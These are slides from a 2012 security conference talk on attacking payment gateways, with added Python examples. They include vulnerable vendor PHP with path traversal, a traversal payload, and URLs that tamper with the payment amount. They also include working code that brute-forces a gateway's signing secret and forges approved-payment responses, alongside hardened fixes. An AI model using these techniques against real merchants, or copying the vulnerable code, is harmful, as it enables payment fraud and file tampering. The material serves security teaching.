Practical attacks on payment gateways and associated functionality
Ruxcon 2012, Melbourne
Eldar Marcussen, Stratsec
Agenda
• Introduction
• Payment gateways
• Weaknesses
• Attacks
• Conclusion
Introduction
A payment gateway is an e-commerce application service provider service that authorizes payments online. It is the equivalent of a physical point of sale terminal. Payment gateways protect credit card details by encrypting sensitive information, such as credit card numbers, to ensure that information is passed securely between the customer and the merchant and also between merchant and the payment processor.
@Wireghoul
• Penetration tester
• Father
• Husband
• Geek
• Blogger
“Bad guys” have an end game:

• Fraudulent transactions
  – Not paying for goods/services
  – Paying very little for goods/services
• Steal credit cards
  – Always popular
  – Easy to convert into cash
Payment gateways are:

• Easy to use!
  – Iframe shopping carts
  – Transaction details in the URL
• Supports developers!
  – Documentation
  – Source code
• Secure!
  – PCI compliant
  – Request validation aka “tamper proof”
  – Use SSL
Testing payment gateways

• Usually out of scope for the penetration test (the gateway is a third party's system)
• Test data: use the gateway's test credit card numbers

  VISA              4111 1111 1111 1111
  Mastercard        5555 5555 5555 4444
  American Express  378282246310005
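The test numbers above are not arbitrary: they pass the Luhn mod-10 check that carts and gateways apply to a PAN before doing anything else, so any client- or server-side PAN validation will accept them in a test environment. The following is an added example (not from the talk) that verifies the three test PANs, derives the check digit for a chosen prefix, and does a coarse brand lookup; the IIN prefixes it knows are the common Visa, Mastercard and American Express ones only, which is an assumption kept deliberately narrow.

```python
import re

# Constructed copy of the test PANs from the slide. They satisfy Luhn but are never issued.
TEST_PANS = {
    "VISA": "4111 1111 1111 1111",
    "Mastercard": "5555 5555 5555 4444",
    "American Express": "378282246310005",
}


def _digits(pan):
    """Strip spaces/dashes; reject anything that is not a pure digit string."""
    clean = re.sub(r"[\s-]", "", pan)
    if not clean.isdigit():
        raise ValueError("PAN may contain only digits, spaces or dashes")
    return [int(c) for c in clean]


def _luhn_sum(digits):
    """Luhn running total: from the right, double every second digit and subtract 9 if it exceeds 9."""
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total


def luhn_valid(pan):
    """True when the PAN has a card-like length and its Luhn sum is a multiple of 10."""
    try:
        digits = _digits(pan)
    except ValueError:
        return False
    return 13 <= len(digits) <= 19 and _luhn_sum(digits) % 10 == 0


def luhn_check_digit(partial):
    """Check digit that makes partial + digit pass Luhn; this is how a test PAN for a chosen prefix is built."""
    total = _luhn_sum(_digits(partial) + [0])  # 0 is a placeholder in the check-digit position
    return str((10 - total % 10) % 10)


def issuer(pan):
    """Coarse brand lookup on the leading digits (assumption: only the three brands on the slide)."""
    clean = re.sub(r"[\s-]", "", pan)
    if clean.startswith("4"):
        return "VISA"
    if clean[:2] in {"51", "52", "53", "54", "55"}:
        return "Mastercard"
    if clean[:2] in {"34", "37"}:
        return "American Express"
    return "unknown"


if __name__ == "__main__":
    for brand, pan in TEST_PANS.items():
        print(f"{brand:17} {pan:22} luhn={luhn_valid(pan)} issuer={issuer(pan)}")
    print("check digit for 411111111111111 ->", luhn_check_digit("411111111111111"))
```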
Transaction diagram (figure; parties shown: Browser, Merchant Website, Payment Gateway)
From the trenches
• What have we seen in “the wild”:
  – Cross site scripting
  – Information disclosure
  – Directory traversal
  – Negative numbers
  – Exposure of credit card numbers
  – Configuration issues
  – Insecure file uploads
  – More
Basic attacks
• Tamper to change payment amount
• Tamper to change currency
• Tamper to change return URL
• Spoof transaction complete
Transaction diagram (figure, repeated; parties shown: Merchant Website, Payment Gateway, Browser)
Basic attacks

• All four basic attacks (amount, currency and return URL tampering, spoofed completion) are solved with request validation
Vendor resources
Using Vendor resources
• Identify vulnerabilities based on vendor resources
  – Documentation
  – Example source code
  – API libraries
  – Shopping cart code
Vendor resources – Example code

```php
<?php
/** Constants */
$customer_data_dir = "/var/tmp";

// Both values come straight from the request body; nothing is validated.
$customer_ref = $_POST["customer_ref"];
$subscription_ref = $_POST["subscription_ref"];

if ($customer_ref == null) {
    header("HTTP/1.0 404 Not Found");
} else {
    // customer_ref is interpolated into the path unchanged: "../" sequences walk out of
    // /var/tmp, and fwrite() then places attacker-chosen content (subscription_ref) there.
    $customer_data = fopen("$customer_data_dir/$customer_ref.txt", "w") or die("Can't open file.");
    fwrite($customer_data, $subscription_ref);
    fclose($customer_data);
}
?>
```
Vendor resources – Example code

```php
<?php
/** Constants */
$customer_data_dir = "/var/tmp";

$customer_ref = $_POST["customer_ref"];

if ($customer_ref == null) {
    header("HTTP/1.0 404 Not Found");
} else {
    // Same unvalidated interpolation, this time into unlink(): any .txt the web server
    // user can delete is reachable with a traversal sequence in customer_ref.
    unlink("$customer_data_dir/$customer_ref.txt");
}
?>
```
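Both vendor snippets above take `customer_ref` from the POST body and splice it into a filesystem path, so `../` sequences reach outside `/var/tmp`: the first writes attacker-chosen content (`subscription_ref`) to any `.txt` path the web server user can create, the second unlinks any `.txt` it can delete (on PHP releases before 5.3.4 a NUL byte in the value also truncated the path, dropping the fixed `.txt` suffix). The following is an added Python illustration, not vendor code: it reproduces the vendor's path construction to show where a traversal payload lands, and beside it a hardened version that allow-lists the reference and checks the resolved path. The data directory is a throwaway temp dir and the reference format `[A-Za-z0-9_-]{1,64}` is an assumption.

```python
import os
import re
import tempfile

# Stand-in for the vendor's "/var/tmp" (a throwaway temp dir, so the demo touches nothing real).
DATA_DIR = tempfile.mkdtemp(prefix="customer_data_")
# Assumed shape of a legitimate customer reference; anything else is rejected outright.
REF_PATTERN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def unsafe_target(customer_ref, data_dir=DATA_DIR):
    """The path the vendor snippets open/unlink: "$dir/$ref.txt" with the POSTed value pasted in.
    A customer_ref of '../../etc/cron.d/job' resolves to /etc/cron.d/job.txt."""
    return os.path.normpath(f"{data_dir}/{customer_ref}.txt")


def escapes(customer_ref, data_dir=DATA_DIR):
    """True when the vendor-style path lands outside data_dir, i.e. the traversal works."""
    root = os.path.realpath(data_dir)
    target = os.path.realpath(unsafe_target(customer_ref, data_dir))
    return not target.startswith(root + os.sep)


def safe_target(customer_ref, data_dir=DATA_DIR):
    """Hardened: allow-list the reference, then confirm the resolved path sits directly in data_dir."""
    if not REF_PATTERN.fullmatch(customer_ref):
        raise ValueError("invalid customer_ref")
    root = os.path.realpath(data_dir)
    target = os.path.realpath(os.path.join(root, customer_ref + ".txt"))
    if os.path.dirname(target) != root:  # belt and braces; the allow-list already rules this out
        raise ValueError("customer_ref escapes the data directory")
    return target


def is_safe_ref(customer_ref):
    try:
        safe_target(customer_ref)
        return True
    except ValueError:
        return False


def save_subscription(customer_ref, subscription_ref):
    """Replacement for the first vendor snippet (fopen 'w' + fwrite)."""
    path = safe_target(customer_ref)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(subscription_ref)
    return path


def read_subscription(customer_ref):
    path = safe_target(customer_ref)
    if not os.path.exists(path):
        return None
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def delete_subscription(customer_ref):
    """Replacement for the second vendor snippet (unlink). Returns True if something was removed."""
    path = safe_target(customer_ref)
    if os.path.exists(path):
        os.unlink(path)
        return True
    return False


if __name__ == "__main__":
    payload = "../../etc/cron.d/job"
    print("vendor path:", unsafe_target(payload), "escapes:", escapes(payload))
    print("hardened accepts payload:", is_safe_ref(payload))
    print(save_subscription("cust-42", "sub-7"), read_subscription("cust-42"))
    print("deleted:", delete_subscription("cust-42"), "now:", read_subscription("cust-42"))
```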
Vendor resources – Shopping carts

Vulnerability classes found in shopping cart software (figure: pie chart). The three largest slices are SQL injection (34%), cross site scripting (27%) and “other” (23%); the remaining slices, file inclusion, information disclosure, traversal, CSRF and buffer overflow, account for 6%, 4%, 3%, 2% and 2% (the order of these five is not recoverable from the chart).
Vendor resources – Shopping carts

• Transaction complete with incomplete payment (SA-CONTRIB-2010-064)
• Price manipulation (OSVDB-32192, 38368, 11429, 11430, 11431 and many others)
• Remote command/code execution
• Authentication bypass
• Customer database exposure
• Arbitrary file upload
• Format string
Vendor resources – Shopping carts
• Use SSL … right?
Request validation
To validate the result returned by the payment page, a signed request is often used: the output of a hash function over the application's parameters, confirmed by a «secret word» known only to the merchant and the payment gateway. -- Wikipedia
Defeating request validation
• Bypass request validation
• Attack the hashing algorithm
• Attack the request validation itself
Bypassing request validation
• HTTP Parameter Pollution (supply the signed value and an attacker value under the same name)
  https://url/pay?amount=100.00&amount=0.01
• Abusing unprotected (unsigned) parameters
  https://url/pay?expiry_date=31/12/2099
• Abusing application logic
  https://url/pay?pre_auth=1
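HTTP Parameter Pollution defeats request validation when the code that verifies the fingerprint and the code that acts on the value read duplicated parameters differently (PHP's `$_GET` keeps the last value, a Java servlet's `getParameter()` returns the first). The following added example, not from the talk, models the slide's `amount=100.00&amount=0.01` URL against a toy merchant/gateway pipeline, and beside it a strict parser that refuses duplicates; the field names, the secret and the one-line SHA1 fingerprint are constructed for the example.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl

SECRET = "merchant-secret"  # assumed shared secret; real ones are issued by the gateway


def sign(merchant, amount, secret=SECRET):
    """Request fingerprint in the style of the deck: plain SHA1 over pipe-joined fields."""
    return hashlib.sha1(f"{merchant}|{secret}|{amount}".encode()).hexdigest()


def first_wins(query):
    """Duplicate-parameter policy where the first occurrence is kept (servlet getParameter() style)."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        params.setdefault(key, value)
    return params


def last_wins(query):
    """Duplicate-parameter policy where the last occurrence is kept (PHP $_GET style)."""
    return dict(parse_qsl(query, keep_blank_values=True))


def process_payment(query, validator=first_wins, biller=last_wins):
    """Returns the amount that gets billed, or None when the fingerprint does not verify.
    Validation and billing deliberately parse with different policies: that mismatch is
    the bug HTTP Parameter Pollution exploits."""
    seen = validator(query)
    if not hmac.compare_digest(sign(seen["merchant"], seen["amount"]), seen["fingerprint"]):
        return None
    return biller(query)["amount"]


def process_payment_strict(query):
    """Hardened: refuse duplicated parameters, then verify and bill from one parsed view."""
    pairs = parse_qsl(query, keep_blank_values=True)
    keys = [k for k, _ in pairs]
    if len(keys) != len(set(keys)):
        return None
    params = dict(pairs)
    if not hmac.compare_digest(sign(params["merchant"], params["amount"]), params["fingerprint"]):
        return None
    return params["amount"]


def legitimate_query(merchant="ABC0010", amount="100.00"):
    """What the merchant site emits: the fields plus a fingerprint over them."""
    return f"merchant={merchant}&amount={amount}&fingerprint={sign(merchant, amount)}"


def polluted_query(merchant="ABC0010", amount="100.00", attacker_amount="0.01"):
    """The same request with a second `amount` appended by the customer (the slide's URL)."""
    return legitimate_query(merchant, amount) + f"&amount={attacker_amount}"


if __name__ == "__main__":
    print("legitimate:", process_payment(legitimate_query()))
    print("polluted, first-wins validation / last-wins billing:", process_payment(polluted_query()))
    print("polluted, strict parser:", process_payment_strict(polluted_query()))
```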
Attacking request validation
• Hashing algorithm attacks
  – MD5 length extension attack (the fingerprint is a bare hash over secret-prefixed data, not an HMAC)
• Hash mismatch behaviour
  – On mismatch the gateway redirects to the attacker-supplied URL (an open redirect on the gateway's own domain)
Breaking request validation
• Brute force attacks
  – Known plaintext: every fingerprint input except the secret is in the form
  – Weak entropy due to text transform (case folding) of the secret
  – Can be done offline
  – Without completing a transaction
Brute force request validation - Example

SHA1 of "EPS_MERCHANTID|Password|EPS_TXNTYPE|EPS_REFERENCEID|EPS_AMOUNT|EPS_TIMESTAMP":

    sha1('ABC0010|password123|0|Test Reference|100.00|20120916221931')
    = 6bec095d6df852d236bc1985f2d5d73009af68a5
The hidden fields the customer's browser posts to the gateway:

```html
<input type="hidden" name="EPS_MERCHANT" value="ABC0010">
<input type="hidden" name="EPS_TXNTYPE" value="0">
<input type="hidden" name="EPS_REFERENCEID" value="Test Reference">
<input type="hidden" name="EPS_AMOUNT" value="100.00">
<input type="hidden" name="EPS_TIMESTAMP" value="20120916221931">
<input type="hidden" name="EPS_FINGERPRINT" value="6bec095d6df852d236bc1985f2d5d73009af68a5">
<input type="hidden" name="EPS_RESULTURL" value="https://www.merchantsite.com/">
```
Mapping the fingerprint inputs to the hidden form fields (every input except the password is visible to the customer):

| Fingerprint component | Web form field  |
|-----------------------|-----------------|
| EPS_MERCHANTID        | EPS_MERCHANT    |
| Password              | (not sent)      |
| EPS_TXNTYPE           | EPS_TXNTYPE     |
| EPS_REFERENCEID       | EPS_REFERENCEID |
| EPS_AMOUNT            | EPS_AMOUNT      |
| EPS_TIMESTAMP         | EPS_TIMESTAMP   |
| (output)              | EPS_FINGERPRINT |
Password is usually:
• Vendor supplied
• User specified
• No change requirements
• Sometimes converted to upper/lower-case before hashing

Formats seen:
• [a-zA-Z0-9]{8}
• [a-z0-9]{8}
• .{8}
• [0-9a-f]{32}

Of these only the 32-hex-digit form (128 bits) is beyond offline brute force. The 8-character forms range from 36^8 (about 2.8 × 10^12) to 95^8 (about 6.6 × 10^15) candidates, which unsalted SHA1 on GPUs covers in minutes to weeks, and case folding collapses [a-zA-Z0-9]{8} into [a-z0-9]{8}.
Breaking request validation
• Once we have broken request validation we can
  – Inject payloads (e.g. SQLi) into fields the signature was supposed to protect
  – Alter cost
  – Alter currency
  – Spoof “payment received” signatures
Breaking response validation

• A string used to validate the transaction output (the result the gateway sends back to the merchant)
• SHA1 hash of EPS_MERCHANTID|Password|EPS_REFERENCEID|EPS_AMOUNT|EPS_TIMESTAMP|EPS_SUMMARYCODE:

    sha1('ABC0010|password123|Test Reference|100.00|20120916221931|1')
    = 633c32a13e87e5f538f5521501013ffe44dc66b3

• Built from the same secret as the request fingerprint: recover it once and both can be signed
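The brute force and the response forgery above, combined in one added Python example (not the talk's demo code): the hidden form supplies every fingerprint input except the password, so the attacker enumerates candidate secrets offline and compares `sha1()` outputs; once the secret is known, the response fingerprint, which uses the same secret, can be forged for any amount. The demo deliberately uses a 3-character secret so the search is 36^3 hashes; `EPS_SUMMARYCODE = "1"` is assumed to mean approved, and `merchant_accepts` is a constructed model of a merchant that trusts the response fingerprint alone.

```python
import hashlib
import hmac
import itertools
import string

# Field order of the deck's two fingerprints; the secret always sits in second position.
REQUEST_ORDER = ("EPS_MERCHANTID", "EPS_TXNTYPE", "EPS_REFERENCEID", "EPS_AMOUNT", "EPS_TIMESTAMP")
RESPONSE_ORDER = ("EPS_MERCHANTID", "EPS_REFERENCEID", "EPS_AMOUNT", "EPS_TIMESTAMP", "EPS_SUMMARYCODE")

# Constructed copy of the slide's hidden form fields (the secret is the one thing not in the form).
FORM = {
    "EPS_MERCHANTID": "ABC0010",
    "EPS_TXNTYPE": "0",
    "EPS_REFERENCEID": "Test Reference",
    "EPS_AMOUNT": "100.00",
    "EPS_TIMESTAMP": "20120916221931",
}


def fingerprint(fields, secret, order):
    """sha1('MERCHANTID|secret|field|field|...') exactly as shown on the slides."""
    parts = [fields[order[0]], secret] + [fields[name] for name in order[1:]]
    return hashlib.sha1("|".join(parts).encode()).hexdigest()


def recover_secret(fields, target, charset, length, order=REQUEST_ORDER):
    """Offline brute force of the secret: one SHA1 per candidate, no transaction needed.
    A gateway that case-folds the secret before hashing lets the attacker use a lowercase charset."""
    for guess in itertools.product(charset, repeat=length):
        candidate = "".join(guess)
        if fingerprint(fields, candidate, order) == target:
            return candidate
    return None


def forge_result(fields, secret, summary_code="1"):
    """With the secret known, sign a gateway result for any amount/reference ("1" assumed to mean approved)."""
    result = {name: fields[name] for name in RESPONSE_ORDER if name in fields}
    result["EPS_SUMMARYCODE"] = summary_code
    result["EPS_FINGERPRINT"] = fingerprint(result, secret, RESPONSE_ORDER)
    return result


def merchant_accepts(result, secret):
    """Model of a merchant that trusts the result fingerprint alone: the behaviour the forgery defeats."""
    expected = fingerprint(result, secret, RESPONSE_ORDER)
    return hmac.compare_digest(expected, result["EPS_FINGERPRINT"]) and result["EPS_SUMMARYCODE"] == "1"


if __name__ == "__main__":
    alphabet = string.ascii_lowercase + string.digits    # [a-z0-9], the case-folded keyspace
    target = fingerprint(FORM, "k3y", REQUEST_ORDER)      # 3 chars keeps the demo at 36**3 hashes
    secret = recover_secret(FORM, target, alphabet, 3)
    print("recovered secret:", secret)
    forged = forge_result(dict(FORM, EPS_AMOUNT="0.01"), secret)
    print("forged 0.01 result accepted by merchant:", merchant_accepts(forged, "k3y"))
    print("keyspace [a-zA-Z0-9]{8} =", 62 ** 8, "vs [a-z0-9]{8} =", 36 ** 8)
```

The fix on the gateway side is an HMAC with a long random key and no case folding, but the merchant cannot change the gateway's scheme; what the merchant can do is not trust the returned fingerprint as proof of payment, which is the subject of the conclusion.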
DEMO
Conclusion

• Don't rely on the browser to drive traffic between the merchant website and the payment gateway
• Always validate the transaction amount and payment status in a secondary request using the gateway API before considering a transaction complete
• Wait for payment to clear before shipping goods
• Use more than one unknown variable in request validation
• Weak request validation does not equal a vulnerability
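The conclusion's advice as an added Python example of the merchant's callback handler (not code from the talk or from any gateway): verify the signature with a constant-time compare, check reference, amount and currency against the stored order rather than the values the browser brought back, reject replays, and only then confirm the payment through a secondary lookup against the gateway API before marking the order paid. The HMAC-SHA256 scheme, the field names, the secret and the in-memory `gateway_lookup` stand-in for the API are all assumptions.

```python
import hashlib
import hmac
from dataclasses import dataclass
from decimal import Decimal, InvalidOperation

SECRET = b"gateway-issued-secret"  # assumed; a real one is provisioned by the gateway
RESPONSE_FIELDS = ("merchant", "reference", "amount", "currency", "timestamp", "summary")


def expected_fingerprint(resp, secret=SECRET):
    """Assumed scheme: HMAC-SHA256 over the pipe-joined fields (a keyed MAC, not the deck's secret-prefix SHA1)."""
    message = "|".join(resp[name] for name in RESPONSE_FIELDS).encode()
    return hmac.new(secret, message, hashlib.sha256).hexdigest()


@dataclass
class Order:
    reference: str
    amount: str
    currency: str
    status: str = "pending"


def _same_money(a, b):
    try:
        return Decimal(a) == Decimal(b)
    except InvalidOperation:
        return False


def verify_payment(order, resp, lookup, secret=SECRET):
    """Decide whether `order` may be marked paid from a gateway result delivered via the browser.
    Returns (ok, reason); every check fails closed."""
    if order.status != "pending":
        return False, "order already settled (replayed result?)"
    if not hmac.compare_digest(expected_fingerprint(resp, secret), resp.get("fingerprint", "")):
        return False, "bad fingerprint"
    if resp["reference"] != order.reference:
        return False, "reference mismatch"
    # Compare against what was stored when the order was created, never against what came back.
    if not _same_money(resp["amount"], order.amount) or resp["currency"] != order.currency:
        return False, "amount/currency differs from the stored order"
    if resp["summary"] != "1":  # assumption: "1" is the gateway's approved code
        return False, "gateway did not approve"
    # Secondary check straight to the gateway: a forged or replayed result cannot change
    # what the gateway's own records say was authorised.
    record = lookup(order.reference)
    if record is None or record["status"] != "approved":
        return False, "no approved payment on the gateway side"
    if not _same_money(record["amount"], order.amount) or record["currency"] != order.currency:
        return False, "gateway record amount/currency mismatch"
    order.status = "paid"
    return True, "ok"


# Constructed stand-in for the gateway's transaction lookup API.
GATEWAY_RECORDS = {
    "ORD-1001": {"status": "approved", "amount": "100.00", "currency": "AUD"},
}


def gateway_lookup(reference):
    return GATEWAY_RECORDS.get(reference)


def make_result(order, summary="1", secret=SECRET, **overrides):
    """Build a signed gateway result for `order`; secret/overrides let the demo emulate forgery and tampering."""
    resp = {"merchant": "ABC0010", "reference": order.reference, "amount": order.amount,
            "currency": order.currency, "timestamp": "20120916221931", "summary": summary}
    resp.update(overrides)
    resp["fingerprint"] = expected_fingerprint(resp, secret)
    return resp


if __name__ == "__main__":
    good = Order("ORD-1001", "100.00", "AUD")
    print(verify_payment(good, make_result(good), gateway_lookup))   # (True, 'ok')
    print(verify_payment(good, make_result(good), gateway_lookup))   # same result replayed
    underpaid = Order("ORD-1001", "999.00", "AUD")
    print(verify_payment(underpaid, make_result(underpaid), gateway_lookup))
```

The last case is the one the lookup exists for: the result carries a valid signature for 999.00 (an attacker who recovered the secret can sign anything), every local check passes, but the gateway's own record says only 100.00 was authorised, so the order stays pending.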
Questions
???